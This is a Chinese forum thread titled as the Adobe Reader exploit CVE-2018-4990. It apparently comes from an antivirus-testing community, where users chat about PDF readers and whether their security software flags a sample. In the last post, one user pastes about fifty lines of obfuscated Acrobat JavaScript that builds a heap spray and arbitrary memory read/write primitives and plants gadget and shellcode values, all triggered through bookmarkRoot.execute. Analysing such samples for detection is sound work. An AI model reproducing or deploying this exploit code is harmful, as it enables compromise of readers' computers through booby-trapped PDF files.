Exploit CVE-2018-4990 (19.02.18)

你好，再见

www-tekeze 发表于 2019-2-18 11:18
PDF很常用的，实机都不装？？ 福昕有安全阅读模式（其它的也应该有），类似于Office的默认禁用宏，通常没 ...

我从来没看过PDF文档（好土啊），要不是前几天看到论坛有人发帖求提取360压缩的PDF查看器，我都不知道有这个东西，好吧，这也算装了吧。。。

www-tekeze

你好，再见 发表于 2019-2-18 11:28
我从来没看过PDF文档（好土啊），要不是前几天看到论坛有人发帖求提取360压缩的PDF查看器，我都不知道有 ...

Adobe Reader是最经典的阅读器，我都快用20年了。。。便捷式文档不受限于操作系统、硬件等等，很多Office文档都需要转成PDF，很多电子书、帮助文档不都是PDF。。。真的很土。。

xiaofeizei

www-tekeze 发表于 2019-2-18 11:43
Adobe Reader是最经典的阅读器，我都快用20年了。。。便捷式文档不受限于操作系统、硬件等等，很多Office ...

老哥多大年纪了是不是财务自由了

你好，再见

www-tekeze 发表于 2019-2-18 11:43
Adobe Reader是最经典的阅读器，我都快用20年了。。。便捷式文档不受限于操作系统、硬件等等，很多Office ...

我电脑里面一个PDF都没有。。。

www-tekeze

xiaofeizei 发表于 2019-2-18 11:49
老哥多大年纪了是不是财务自由了

注册信息79年生，今年四十正式迈入不惑之年。。。闲得蛋疼。。

swizzer

avast kill

huang1111

www-tekeze 发表于 2019-2-18 11:43
Adobe Reader是最经典的阅读器，我都快用20年了。。。便捷式文档不受限于操作系统、硬件等等，很多Office ...

用浏览器开pdf文档就好了。。。。

www-tekeze

huang1111 发表于 2019-2-18 14:27
用浏览器开pdf文档就好了。。。。

那个仅仅只是浏览下，没有编辑等功能，WPS很多年前就自带文档转PDF功能了。

QCfan

嘤嘤嘤，这里面根本没有exp啊2333333看了一下里面js，里面啥也没有233333没看见任何exp啊。KIS19(d)没问题233333
fb那个样本倒是没啥问题，完美报毒哈哈哈哈哈哈

mx9

QCfan 发表于 2019-2-18 20:49
嘤嘤嘤，这里面根本没有exp啊2333333看了一下里面js，里面啥也没有233333没看见任何exp啊。KIS19(d)没问 ...

1. for (var qweqwe, qweqwebase, asdasd, zxczxc, _0xcdea = ["myfun1()", "setTimeOut", "Button1", "getField", "display", "visible", "myfun2()", "hidden", "byteLength", "setUint32", "getUint32", "length", "bookmarkRoot", "execute"], uiouio = [2338642737, 2139828347, 478120716, 2332575627, 1066082423, 856456832, 3347706485, 2335995907, 3254876247, 18905739, 2346551751, 3321999156, 1128169797, 1969317234, 142508530, 1936024431, 2055989621, 1724317988, 2339318923, 3338738810, 4239359115, 3649685249, 3797155761, 1633904893, 3800654700, 1397969490, 1397969747, 3623834450, 929599632, 3087007763, 305419896, 2425360639, 3270021264], spraylen = 65512, fghfgh = 4096, rtyrty = 219021384, spraypos = 219086936, sprayarr = new Array(fghfgh), step = 0, l1 = 12288, a1 = new Array(l1), i1 = 1; i1 < l1; i1++) a1[i1] = new Uint32Array(252), a1[i1][249] = rtyrty, a1[i1][250] = rtyrty + 65536;
   
2. for (i1 = 1; i1 < fghfgh; i1++) sprayarr[i1] = new Uint32Array(1);
   
3. for (i1 = 1; i1 < fghfgh; i1++) sprayarr[i1] = new ArrayBuffer(spraylen);
   
4. for (i1 = 1; i1 < l1; i1 += 2) delete a1[i1], a1[i1] = null;
   
5. var sprayarr2 = new Array(256),
   
6.         sto1 = app[_0xcdea[1]](_0xcdea[0], 3500);
   
7. 
   
8. function myfun1() {
   
9.         for (var a = new Array(512), r = 1; r < 512; r++) a[r] = new Uint32Array(250);
   
10.         var y = this[_0xcdea[3]](_0xcdea[2]);
    
11.         y && (y[_0xcdea[4]] = display[_0xcdea[5]]);
    
12.         app[_0xcdea[1]](_0xcdea[6], 250)
    
13. }
    
14. function myfun2() {
    
15.         var a = this[_0xcdea[3]](_0xcdea[2]);
    
16.         a && (a[_0xcdea[4]] = display[_0xcdea[7]]);
    
17.         for (var r = 1; r < 64; r++) sprayarr2[r] = new ArrayBuffer(131048);
    
18.         for (r = 1; r < fghfgh; r++) if (131048 == sprayarr[r][_0xcdea[8]]) {
    
19.                 var y = new DataView(sprayarr[r]);
    
20.                 y[_0xcdea[9]](65524, 1717986918);
    
21.                 for (var e = r; e < fghfgh; e++) if (1717986918 == sprayarr[e][_0xcdea[8]]) {
    
22.                         r = e, y = new DataView(sprayarr[r]);
    
23.                         break
    
24.                 }
    
25.                 for (var d = new Array(65536), s = 16; s < 65536; s++) d[s] = new Uint32Array(1);
    
26.                 for (s = 1; s < 16; s++) d[s] = new Uint32Array(sprayarr[r + s]), d[s][0] = s;
    
27.                 for (s = 196608; s < 1048576; s += 4) if (y[_0xcdea[10]](s, !0) == spraylen && y[_0xcdea[10]](s + 4, !0) > spraypos) {
    
28.                         var m = (asdasd = y)[_0xcdea[10]](s + 12, !0);
    
29.                         qweqwe = d[m], zxczxc = y[_0xcdea[10]](s + 4, !0) - spraypos + 80, asdasd[_0xcdea[9]](zxczxc - 16, 1048576, !0);
    
30.                         var i = [1803060315, 1803060315, 1803060314, 1803382916, 1801787239, 1801724685, qweqwebase = asdasd[_0xcdea[10]](zxczxc, !0), 1801841839, 1801861707, qweqwebase, 66049, 4096, 64, 3435973836, 1094795585],
    
31.                                 n = myread(myread(myread(myread(qweqwebase - 8) + 4)) + 8) - 65536 & 4294901760;
    
32.                         uiouio[uiouio[_0xcdea[11]] - 3] = 1667576 + n;
    
33.                         var p = this[_0xcdea[12]],
    
34.                                 t = 2464676 + n;
    
35.                         t = myread(t);
    
36.                         for (s = 0; s < i[_0xcdea[11]]; s += 1) qweqwe[s + 3] = 1801715712 < i[s] ? i[s] - 1801715712 + n : i[s];qweqwe[s + 3 - 2] = 2425393296;
    
37.                         for (var c = 0; c < uiouio[_0xcdea[11]]; c += 1) qweqwe[s + 3 + c] = uiouio[c];mywrite(t, 818438 + n),
    
38.                         mywrite(t + 4, qweqwebase),
    
39.                         mywrite(t + 1432, 276639 + n),
    
40.                         p[_0xcdea[13]]();
    
41.                         break
    
42.                 }
    
43.         }++step < 1e6 && myfun1()
    
44. }
    
45. function myread(a) {
    
46.         asdasd[_0xcdea[9]](zxczxc, a, !0);
    
47.         var r = qweqwe[0];
    
48.         return asdasd[_0xcdea[9]](zxczxc, qweqwebase, !0), r
    
49. }
    
50. function mywrite(a, r) {
    
51.         asdasd[_0xcdea[9]](zxczxc, a, !0), qweqwe[0] = r, asdasd[_0xcdea[9]](zxczxc, qweqwebase, !0)

复制代码